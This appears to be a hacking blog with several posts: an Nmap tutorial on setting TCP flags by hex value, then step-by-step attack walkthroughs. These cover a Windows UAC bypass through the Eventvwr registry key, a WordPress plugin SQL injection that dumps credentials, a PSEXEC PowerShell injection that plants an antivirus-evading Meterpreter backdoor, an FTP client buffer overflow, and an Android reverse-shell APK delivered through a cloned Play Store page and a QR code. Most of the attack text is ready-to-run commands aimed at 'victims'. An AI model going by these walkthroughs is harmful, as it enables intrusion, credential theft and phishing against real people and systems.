by luhackblog

Nmap Scans using Hex Value of Flags

In this article we are going to scan the target machine by sending TCP flags through their hexadecimal value and the actual Flag name can be confirm by analysis of Nmap traffic through Wireshark.

Let’s have a look over Hex value of TCP Flag in given below table which we are going to use in Nmap for port enumeration.

NULL Scan

In this scan we are sending the NONE flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x00 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-NONE flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-NONE packet for hex value 0x00 coming from 192.168.1.104 on port 21 as shown in given below image.

FIN Scan

TCP-FIN flag always used for finished the communication with target network. In this scan we are sending the FIN flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x01 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-FIN flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-FIN packet for hex value 0x01 coming from 192.168.1.104 on port 21 as shown in given below image.

SYN Scan

TCP-SYN flag always initiate communication to establish the connection with target network. In this scan we are sending the SYN flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x02 192.168.1.103

From given below image you can observe we have successfully found port 21 open.

When network admin will captured the incoming traffic he will get packet for TCP-SYN flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-SYN packet for hex value 0x02 coming from 192.168.1.104 on port 21 as shown in given below image.

Reset Scan

RST flag is used to reset the connection between the sender machine and the target machine. In this scan we are sending the RST flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x04 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-RST flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-RST packet for hex value 0x04 coming from 192.168.1.104 on port 21 as shown in given below image.

PUSH Scan

In this scan we are sending the PSH flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x08 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-PSH flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-PSH packet for hex value 0x08 coming from 192.168.1.104 on port 21 as shown in given below image.

PUSH flag is used to push the process priority higher of the packet to the target machine.

ACK Scan

Ack flag is used to acknowledge the sender machine whether the packet is received or dropped by the target. So that the sender again send the lost or dropped packet on the target network to complete the communication process. Here we are sending the ACK flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x10 192.168.1.103

From given below image you can observe we have found port 21 closed.

When network admin will captured the incoming traffic he will get packet for TCP-ACK flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-ACK packet for hex value 0x10 coming from 192.168.1.104 on port 21 as shown in given below image.

Open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don’t respond, or send certain ICMP error messages back (type 3, code 0, 1, 2, 3, 9, 10, or 13), are labeled filtered. (Form Nmap.org)

Urgent Scan

URG flag is used to set the high process priority of the packet to the target. So that target machine stops processing the current packet and process the URG Flag packet. In this scan we are sending the Urg flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x20 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-URG flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-URG packet for hex value 0x20 coming from 192.168.1.104 on port 21 as shown in given below image.

XMAS Scan

In this scan we are sending the combination of hexadecimal value of the different flag on the target machine. As we know in Xmas scan combination of three TCP-flags [FIN, PSH, URG] are used to enumerate state of port.

By adding the value of the flag, which is equal to the hexadecimal value of the sender’s hexadecimal value as describe in given below table.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x29 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, PSH, URG] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, PSH, URG for hex value 0x29 coming from 192.168.1.104 on port 21 as shown in given below image.

Manual Combination of Flags [FIN, SYN, PSH]

Let have a quick review over decimal to hexadecimal conversion with the help of following table:

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port. For example we want to scan any port by sending combination of three flags [FIN, SYN, and PSH] so let identify hex value for sum of three flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0B 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, SYN and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, SYN,PSH for hex value 0x0B coming from 192.168.1.104 on port 21 as shown in given below image.

Manual Combination of Flags [FIN, RST, PSH]

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port. For example we want to scan any port by sending combination of three flags [FIN, RST, and PSH] so let identify hex value for sum of three flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0D 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, RST and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, RST,PSH for hex value 0x0D coming from 192.168.1.104 on port 21 as shown in given below image.

Manual Combination of Flags [FIN, SYN, RST, PSH]

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port. For example we want to scan any port by sending combination of four flags [FIN, SYN, RST, and PSH] so let identify hex value for sum of four flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0F 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN,SYN, RST and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, SYN, RST,PSH for hex value 0x0Fcoming from 192.168.1.104 on port 21 as shown in given below image.

12.28.16

by luhackblog

Hack Admin Access of Remote windows 10 PC using Eventvwr Registry Key Exploit

First of all, to learn to how to hack victim’s PC click here. After hacking when you have gained a meterpreter session then type:

getprivs

using this command you will confirm the fact that you have not entered the administrator yet. So now, there is no need to worry.

Now use the following exploit

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess () after starting your payload in a separate process.

As the command will make our file execute we will have a session with administrator privileges as shown

12.28.16

by luhackblog

WordPress Penetration Testing using Symposium Plugin SQL Injection

WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy.”

WordPress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter ‘size’. The issue is exploitable even if the plugin is deactivated.

The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users’ password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the WordPress installation. Collected information may also allow further attacks.

https://www.exploit-db.com/exploits/37824

Attacker: kali Linux

Target: wordpress

Let start!!!!

Start WPSCAN in kali from following step:

Now scan the target IP for scanning any wordpress application and type following command

Through this command we are scanning current plugin installed for any wordpress website.

./wpscan.rb –url http://192.1681.0.104 –enumerate p

The red sign indicating wp symposium 15.5.1 is vulnerable and suffers from an unauthenticated SQL Injection although blue sign shows version 15.8 if fixed which is not vulnerable till now.

Now start metasploit for attack and type msfconsole on terminal in kali Linux.

msf > use auxiliary/admin/http/wp_symposium_sql_injection

msf auxiliary(wp_symposium_sql_injection) >set rhost 192.1681.0.104

msf auxiliary(wp_symposium_sql_injection) >set rport 80

msf auxiliary(wp_symposium_sql_injection) >exploit

Nice!!! Here we found the relevant username and password as user: raj respectively.

12.28.16

by luhackblog

Hack Remote PC using PSEXEC Injection in SET Toolkit

Attacker machine: kali Linux

In this article I am going to make powershell injection attack though SEToolkit; for this attack it is necessary that SMB service must be running and you should aware of username and password of your target pc to get the Meterpreter session.

Let’s Begin The Game!!!

Scan the victim IP from NMAP by typing following command on terminal in kali Linux

Nmap –sV 192.168.1.104

Under version scan it shows port 445 is open and if you are not aware from port protocol services then let me tell you that port 445 is use for SMB protocol for making communication between two different operating systems like as we have Linux and windows.

Now Click Applications > Exploitation Tools > Social Engineering Toolkit > setoolkit.

A new terminal gets open for setoolkit framework and now you have to follow these steps for making attack on target.

From screenshot you can perceive that it through a menu to select following approach for attack.

Choose penetration testing (fast-track) and type2 for this method.

Fast-Track is an automated penetration suite for penetration testers. So from next screenshot again we have following option, choose PSEXEC Powershell Injection and type 6 for it.

PSEXEC Powershell Injection Attack: This attack will inject a meterpreter backdoor through powershell memory injection. This will avoid Anti-Virus since we will never touch disk or memory. Will require Powershell to be installed on the remote victim machine. You can use either straight passwords or hash values.

Now give following information to execute attack on victim pc.

Enter remote IP as rhost: 192.168.1.104

Enter username: administrator

Enter password: Ignite@1234

If you don’t know the domain name hit enter only for this and same for random select to number of threads hit enter.

Enter listener IP as lhost: 192.168.1.3

Enter port number: 445

Now this will generate a payload for powershell injection and start loading metasploit framework itself. From below image you will found that through alphabetic shellcode we have got meterpreter session1 open.

Now type sessions to view active session

Further Type sessions –I 1 to get inside meterpreter mode.

Meterpreter> sysinfo

{NOTE: This attack is depending upon the version of SMB PROTOCOL; if version is updated of 2.1 then may be this attack is not successful. Use aggressive scanning method for version detail.}

11.25.16

by luhackblog

Best Website Vulnerability Scanners Free

These Web Scanners are best for finding bugs in the websites..

Acunetix web vulnerability scanner download here : click here

Burp Suite Proxy Download : Click here

Netsparker web vulnerability scanner Download : Click here

Nikto Web Vulnerability Scanner Download : Click here

Nessus Web Vulnerability Scanner Download : Click Here

11.24.16

by luhackblog

jjjj

11.21.16

by luhackblog

Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow

This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.

Exploit Targets

WinaXe 7.7 FTP client

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/winaxe_server_ready

msf exploit (winaxe_server_ready)>set lhost 192.168.0.106

msf exploit (winaxe_server_ready)>set srvhost 192.168.0.106

msf exploit (winaxe_server_ready)>set payload windows/meterpreter/reverse_tcp

msf exploit (winaxe_server_ready)>exploit

Now send the link to the victim when victim, enter in connection details and wait for the FTP connection WinaXe ftp. You will get victim meterpreter session.

Hack Android Phone using HTA Attack with QR Code

QR Code is a 2 dimensional barcode which can be scanned using Smartphone’s or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when take over whole world as there is growth in SEO.

Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.

Our step is to create a pernicious file using msfvenom.

Msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select 2^nd option which indicates Website Attack Vectors?

Then further select 8^th option which refers to HTA Attack Method.

And then select Site Cloner by typing 2.

When you type the said 2 option, it will ask you enter the URL that you want to clone. Here give the URL of play store: https://play.google.com/store